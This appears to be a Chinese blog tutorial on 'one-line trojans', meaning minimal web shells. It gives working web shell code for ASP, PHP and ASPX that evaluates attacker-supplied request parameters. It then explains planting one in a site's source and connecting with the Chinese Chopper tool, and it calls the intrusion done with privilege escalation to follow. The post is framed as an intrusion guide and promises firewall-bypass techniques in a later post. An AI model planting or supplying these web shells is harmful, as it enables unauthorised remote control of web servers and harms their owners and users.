好久没有更新文章了，今天来更新一篇文章，还是很基本的东西

一句话木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。

常用一句话木马

asp一句话木马：

<%execute( Request (“value”))%>

php一句话木马：

<?php @eval($_POST[value]);?>

aspx 一句话木马：

<%@ Page Language=”Jscript”%>

<%eval(Request.Item[“value”])%>

这里不讲入侵的详细步骤，讲一下原理 以我搭建的环境为例

这个网站的源代码有需要的也可以找我要一下，

1，首先我们在源代码中植入一句话木马，这个上传的方式有很多，大家可以去试一下，如果有 安全狗 拦截 以后我们会讲绕过安全狗的方法，

这个网站的是asp格式的，我们在网站源码中新建一个记事本，输入<%eval request(“c”)%> c是自己定义的，保存为asp格式，命名为1

2，接下来 我们访问这个asp

我们看到我们访问的页面什么都没有，这是正确的

3，我们使用菜刀工具

右键添加 点击添加

然后双击打开，

入侵完成，我们可以进一步的提权，拿下整个服务器。

下期会讲图片传入一句话木马，和大小马的用处